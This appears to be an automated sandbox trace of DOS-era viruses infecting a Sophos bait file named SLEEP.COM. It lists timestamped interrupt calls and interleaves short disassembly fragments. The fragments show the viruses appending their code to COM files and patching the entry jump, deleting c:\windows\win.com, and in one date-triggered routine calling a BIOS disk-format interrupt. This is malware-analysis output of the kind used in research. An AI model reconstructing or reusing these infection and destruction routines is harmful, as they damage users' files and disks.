2018-12-25T12:22:19.77337649Z 47 PC: 14056 | Get disk transfer address
2018-12-25T12:22:19.77500445Z 26 PC: 14063 | Set disk transfer address
2018-12-25T12:22:19.77672707Z 78 PC: 140d6 | Find first file
2018-12-25T12:22:19.788269622Z 67 PC: 1411a | Get or set file attributes
2018-12-25T12:22:19.795527823Z 67 PC: 14128 | Get or set file attributes
2018-12-25T12:22:19.984550291Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.993439321Z 87 PC: 1413c | Get or set file date and time
2018-12-25T12:22:19.995155313Z 44 PC: 14146 | Get time
    0x14146: mov ah, 0x3f
    0x14148: mov cx, 3
    0x1414b: lea dx, word ptr [si + 0x13]
    0x1414e: int 0x21
    0x14150: jb 0x14199
    0x14152: cmp ax, 3
    0x14155: jne 0x14199
    0x14157: mov ax, 0x4202
    0x1415a: xor cx, cx
    0x1415c: xor dx, dx
    0x1415e: int 0x21
    0x14160: jb 0x14199
    0x14162: mov cx, ax
    0x14164: sub ax, 3
    0x14167: mov word ptr [si + 0x17], ax
    0x1416a: add cx, 0x2bd
    0x1416e: mov word ptr [si - 0x1bc], cx
    0x14172: mov ah, 0x40
    0x14174: mov cx, 0x1e1
    0x14177: nop
2018-12-25T12:22:19.997748843Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.001147485Z 66 PC: 14160 | Move file pointer
2018-12-25T12:22:20.002975038Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.139117176Z 66 PC: 1418d | Move file pointer
2018-12-25T12:22:20.141609709Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-25T12:22:20.145357302Z 87 PC: 141aa | Get or set file date and time
2018-12-25T12:22:20.148087128Z 62 PC: 141ae | Close file
2018-12-25T12:22:20.166617239Z 67 PC: 141b9 | Get or set file attributes
2018-12-25T12:22:20.180285595Z 26 PC: 141c4 | Set disk transfer address
2018-12-25T12:22:20.182596155Z 26 PC: 13e67 | Set disk transfer address
2018-12-25T12:22:20.184966639Z 78 PC: 13ea5 | Find first file
2018-12-25T12:22:20.193130156Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.198299689Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-25T12:22:20.200445169Z 66 PC: 13ed9 | Move file pointer
2018-12-25T12:22:20.204029584Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.208127195Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.220057061Z 66 PC: 13f02 | Move file pointer
2018-12-25T12:22:20.223279386Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.226898175Z 62 PC: 13e99 | Close file
2018-12-25T12:22:20.237023475Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.249192239Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.264009107Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.271397752Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.274396963Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.277975635Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.280948258Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.28384655Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.287669738Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.296783043Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.30018298Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.309364423Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.316452994Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.318597879Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.322820176Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.331100753Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.333310317Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.339176721Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.345843791Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.352733203Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.36620952Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.37516249Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.377089282Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.380922192Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.390836722Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.392932448Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.403161828Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.413133105Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.415890356Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.424332412Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.432020543Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.434067502Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.438239685Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.44753068Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.449512781Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.458421094Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.46512816Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.467257518Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.47417947Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.481803657Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.484326356Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.489020379Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.497676426Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.499828632Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.509393059Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.519140224Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.522701976Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.531651219Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.539047787Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.541050063Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.544849984Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.554491861Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.556551619Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.565176971Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.57529662Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.578738269Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.587499531Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.595643431Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.597740537Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.60621837Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.616412595Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.617672046Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.619702412Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.625908549Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.631864729Z 26 PC: 13e7b | Set disk transfer address
2018-12-25T12:22:20.639955732Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:22:20.652189037Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":26,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9008,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:18.568807633Z 26 PC: 147b3 | Set disk transfer address
2018-12-25T12:22:18.570992265Z 250 PC: 147bb | UNKNOWN!
2018-12-25T12:22:18.571957799Z 71 PC: 147c6 | Get current directory
2018-12-25T12:22:18.574967904Z 25 PC: 147ca | Get default drive
2018-12-25T12:22:18.576486899Z 78 PC: 147e2 | Find first file
2018-12-25T12:22:18.588827137Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.608983996Z 66 PC: 14803 | Move file pointer
2018-12-25T12:22:18.610669417Z 62 PC: 148d3 | Close file
2018-12-25T12:22:18.613508741Z 79 PC: 148db | Find next file
2018-12-25T12:22:18.617041089Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.623720571Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.631780638Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.633637297Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.636178125Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.643879445Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.645614764Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.647666684Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.651484793Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.658277755Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.659962014Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.662010884Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.66781092Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.674429998Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.676077244Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.678762496Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.681529042Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.688187529Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.690326901Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.692896199Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.695517098Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.702450053Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.703900218Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.705815402Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.708922955Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.715335831Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.716665103Z 66 PC: 14824 | Move file pointer
2018-12-25T12:22:18.723132794Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:18.731198429Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.733228832Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.736829232Z 59 PC: 148f7 | Change current directory
2018-12-25T12:22:18.740824054Z 62 PC: 148b0 | Close file
2018-12-25T12:22:18.742365052Z 26 PC: 148b7 | Set disk transfer address
2018-12-25T12:22:18.744511234Z 59 PC: 148bf | Change current directory
2018-12-25T12:22:18.748460272Z 26 PC: 145e2 | Set disk transfer address
2018-12-25T12:22:18.749471692Z 71 PC: 14682 | Get current directory
2018-12-25T12:22:18.753035879Z 78 PC: 145f1 | Find first file
2018-12-25T12:22:18.758785251Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.770441601Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:22:18.77762413Z 66 PC: 14630 | Move file pointer
2018-12-25T12:22:18.779509562Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:22:18.782360028Z 66 PC: 14648 | Move file pointer
2018-12-25T12:22:18.784139771Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-25T12:22:18.798706963Z 62 PC: 14659 | Close file
2018-12-25T12:22:18.806495826Z 59 PC: 14661 | Change current directory
2018-12-25T12:22:18.810748086Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-25T12:22:19.154180883Z 59 PC: 1466e | Change current directory
2018-12-25T12:22:19.155980908Z 26 PC: 14677 | Set disk transfer address
2018-12-25T12:22:19.157239247Z 71 PC: 1441e | Get current directory
2018-12-25T12:22:19.161612605Z 26 PC: 1443d | Set disk transfer address
2018-12-25T12:22:19.162743443Z 78 PC: 14447 | Find first file
2018-12-25T12:22:19.169654744Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.179200903Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.186005383Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.19267474Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.196571398Z 66 PC: 1448b | Move file pointer
2018-12-25T12:22:19.197911114Z 44 PC: 14491 | Get time 0x14491: inc dl
0x14493: mov byte ptr [bp + 0x2d9], dl
0x14497: pushaw
0x14498: call 0x243f2
0x1449b: popaw
0x1449c: mov byte ptr [bp + 0x330], 0xe9
0x144a1: mov ax, word ptr [bp + 0x34e]
0x144a5: sub ax, 3
0x144a8: mov word ptr [bp + 0x331], ax
0x144ac: mov word ptr [bp + 0x333], 0x60
0x144b2: mov ah, 0x40
0x144b4: mov cx, 4
0x144b7: lea dx, word ptr [bp + 0x330]
0x144bb: int 0x21
0x144bd: mov ax, 0x4202
0x144c0: xor cx, cx
0x144c2: xor dx, dx
0x144c4: int 0x21
0x144c6: mov ah, 0x40
0x144c8: mov cx, 0x1d6
2018-12-25T12:22:19.200333533Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.204075243Z 66 PC: 144c6 | Move file pointer
2018-12-25T12:22:19.205767341Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:22:19.213966606Z 42 PC: 144da | Get date 0x144da: cmp dx, 0x71a
0x144de: je 0x1453f
0x144e0: cmp dx, 0xc06
0x144e4: je 0x1453f
0x144e6: lea dx, word ptr [bp + 0x29f]
0x144ea: mov ah, 0x3b
0x144ec: int 0x21
0x144ee: jb 0x144f3
0x144f0: jmp 0x1443d
0x144f3: mov ax, 0x5701
0x144f6: mov dx, word ptr [bp + 0x326]
0x144fa: mov cx, word ptr [bp + 0x324]
0x144fe: int 0x21
0x14500: mov ah, 0x3e
0x14502: int 0x21
0x14504: mov ax, 0x4301
0x14507: lea dx, word ptr [bp + 0x352]
0x1450b: xor ch, ch
0x1450d: mov cl, byte ptr [bp + 0x323]
0x14511: int 0x21
2018-12-25T12:22:19.217277383Z 64 PC: 1454f | Write file or device (Write 44 bytes on handle 1)
2018-12-25T12:22:19.221985222Z 87 PC: 14500 | Get or set file date and time
2018-12-25T12:22:19.223787437Z 62 PC: 14504 | Close file
2018-12-25T12:22:19.232459909Z 67 PC: 14513 | Get or set file attributes
2018-12-25T12:22:19.242230335Z 59 PC: 1451b | Change current directory
2018-12-25T12:22:19.245958617Z 26 PC: 14527 | Set disk transfer address
2018-12-25T12:22:19.24795504Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:22:19.249132056Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:22:19.250248326Z 26 PC: 14274 | Set disk transfer address
2018-12-25T12:22:19.251510049Z 71 PC: 14281 | Get current directory
2018-12-25T12:22:19.254971431Z 42 PC: 14286 | Get date 0x14286: cmp dl, 6
0x14289: jne 0x142ad
0x1428b: mov ax, 0x500
0x1428e: mov cx, 0
0x14291: mov dh, 0
0x14293: mov dl, 0x80
0x14295: int 0x13
0x14297: jb 0x1425a
0x14299: mov ah, 9
0x1429b: lea dx, word ptr [si + 0x27d]
0x1429f: int 0x21
0x142a1: nop
0x142a2: jmp 0x142a1
0x142a4: mov cx, 0x4eb
0x142a7: jmp 0x142a5
0x142a9: cli
0x142aa: jmp 0x142a0
0x142ac: iret
0x142ad: lea dx, word ptr [si + 0x25c]
0x142b1: xor cx, cx
2018-12-25T12:22:19.257051339Z 78 PC: 142b7 | Find first file
2018-12-25T12:22:19.263056642Z 61 PC: 142c2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.270627636Z 63 PC: 142d1 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.273470506Z 87 PC: 142ec | Get or set file date and time
2018-12-25T12:22:19.275247495Z 66 PC: 142fc | Move file pointer
2018-12-25T12:22:19.27787961Z 63 PC: 14305 | Read file or device (Read 2 bytes on handle 6)
2018-12-25T12:22:19.284767171Z 44 PC: 1430f | Get time 0x1430f: or dx, dx
0x14311: je 0x1430b
0x14313: mov word ptr [si + 0x2df], dx
0x14317: xor dx, dx
0x14319: xor cx, cx
0x1431b: mov ax, 0x4202
0x1431e: int 0x21
0x14320: or dx, dx
0x14322: jne 0x142d6
0x14324: cmp ah, 0xfe
0x14327: jae 0x142d6
0x14329: call 0x24240
0x1432c: mov ax, 0x4200
0x1432f: xor cx, cx
0x14331: mov dx, 1
0x14334: int 0x21
0x14336: mov ah, 0x40
0x14338: lea dx, word ptr [si + 0x2e4]
0x1433c: mov cx, 2
0x1433f: int 0x21
2018-12-25T12:22:19.287202668Z 66 PC: 14320 | Move file pointer
2018-12-25T12:22:19.290093672Z 64 PC: 14252 | Write file or device (Write 476 bytes on handle 6)
2018-12-25T12:22:19.298465694Z 66 PC: 14336 | Move file pointer
2018-12-25T12:22:19.300247374Z 64 PC: 14341 | Write file or device (Write 2 bytes on handle 6)
2018-12-25T12:22:19.303697321Z 87 PC: 14348 | Get or set file date and time
2018-12-25T12:22:19.305171902Z 62 PC: 1434c | Close file
2018-12-25T12:22:19.313051338Z 59 PC: 14354 | Change current directory
2018-12-25T12:22:19.315744426Z 26 PC: 1435b | Set disk transfer address
2018-12-25T12:22:19.316823057Z 48 PC: 1404a | Get DOS version
2018-12-25T12:22:19.317985473Z 47 PC: 14056 | Get disk transfer address
2018-12-25T12:22:19.319981942Z 26 PC: 14063 | Set disk transfer address
2018-12-25T12:22:19.321149826Z 78 PC: 140d6 | Find first file
2018-12-25T12:22:19.327292919Z 67 PC: 1411a | Get or set file attributes
2018-12-25T12:22:19.333793376Z 67 PC: 14128 | Get or set file attributes
2018-12-25T12:22:19.343859279Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.350465208Z 87 PC: 1413c | Get or set file date and time
2018-12-25T12:22:19.352266518Z 44 PC: 14146 | Get time 0x14146: mov ah, 0x3f
0x14148: mov cx, 3
0x1414b: lea dx, word ptr [si + 0x13]
0x1414e: int 0x21
0x14150: jb 0x14199
0x14152: cmp ax, 3
0x14155: jne 0x14199
0x14157: mov ax, 0x4202
0x1415a: xor cx, cx
0x1415c: xor dx, dx
0x1415e: int 0x21
0x14160: jb 0x14199
0x14162: mov cx, ax
0x14164: sub ax, 3
0x14167: mov word ptr [si + 0x17], ax
0x1416a: add cx, 0x2bd
0x1416e: mov word ptr [si - 0x1bc], cx
0x14172: mov ah, 0x40
0x14174: mov cx, 0x1e1
0x14177: nop
2018-12-25T12:22:19.355355973Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.358124536Z 66 PC: 14160 | Move file pointer
2018-12-25T12:22:19.359854661Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:19.368693508Z 66 PC: 1418d | Move file pointer
2018-12-25T12:22:19.370317632Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-25T12:22:19.374144557Z 87 PC: 141aa | Get or set file date and time
2018-12-25T12:22:19.376789476Z 62 PC: 141ae | Close file
2018-12-25T12:22:19.385832213Z 67 PC: 141b9 | Get or set file attributes
2018-12-25T12:22:19.399399557Z 26 PC: 141c4 | Set disk transfer address
2018-12-25T12:22:19.401704125Z 26 PC: 13e67 | Set disk transfer address
2018-12-25T12:22:19.403076032Z 78 PC: 13ea5 | Find first file
2018-12-25T12:22:19.409553185Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.416874413Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-25T12:22:19.419974313Z 66 PC: 13ed9 | Move file pointer
2018-12-25T12:22:19.421628791Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.426196317Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:19.434290527Z 66 PC: 13f02 | Move file pointer
2018-12-25T12:22:19.435920526Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.439434737Z 62 PC: 13e99 | Close file
2018-12-25T12:22:19.447727096Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.451059395Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.458098928Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.464340862Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.465719454Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.469512412Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.473090625Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.474909839Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.478077117Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.487002431Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.490063538Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.496863056Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.504466051Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.506161214Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.509064048Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.51861647Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.519952386Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.526281748Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.536254452Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.539145028Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.545738478Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.553064095Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.555044077Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.557759618Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.566725568Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.568301119Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.574783727Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.584096585Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.586748979Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.593165776Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.600174461Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.601863675Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.604780676Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.613372818Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.615125918Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.622372779Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.6322192Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.635404363Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.642092788Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.649394317Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.65215332Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.6551048Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.664035344Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.666058323Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.672720939Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.681738914Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.684851334Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.69143801Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.698089448Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.700561947Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.703445438Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.711304823Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.71387676Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.720870815Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.729076816Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.73283248Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.739406821Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.745855203Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.748087859Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.755165247Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.762969646Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.765552274Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.768498986Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.776652169Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.779659339Z 26 PC: 13e7b | Set disk transfer address
2018-12-25T12:22:19.780780112Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:22:19.787901976Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":6,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9008,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:18.753430685Z 26 PC: 147b3 | Set disk transfer address
2018-12-25T12:22:18.756281236Z 250 PC: 147bb | UNKNOWN!
2018-12-25T12:22:18.7575977Z 71 PC: 147c6 | Get current directory
2018-12-25T12:22:18.761181972Z 25 PC: 147ca | Get default drive
2018-12-25T12:22:18.763375727Z 78 PC: 147e2 | Find first file
2018-12-25T12:22:18.770105087Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.777279635Z 66 PC: 14803 | Move file pointer
2018-12-25T12:22:18.784440013Z 62 PC: 148d3 | Close file
2018-12-25T12:22:18.786313787Z 79 PC: 148db | Find next file
2018-12-25T12:22:18.788066008Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.792150099Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.793550037Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.795308848Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.798350766Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.811590312Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.813863834Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.816226723Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.820640917Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.827862756Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.829334986Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.832107876Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.834797013Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.839564024Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.842064536Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.844873881Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.848158411Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.854470398Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.856013599Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.857814292Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.860546414Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.867788097Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.869301432Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.871049371Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.873991808Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.881295499Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.883965612Z 66 PC: 14824 | Move file pointer
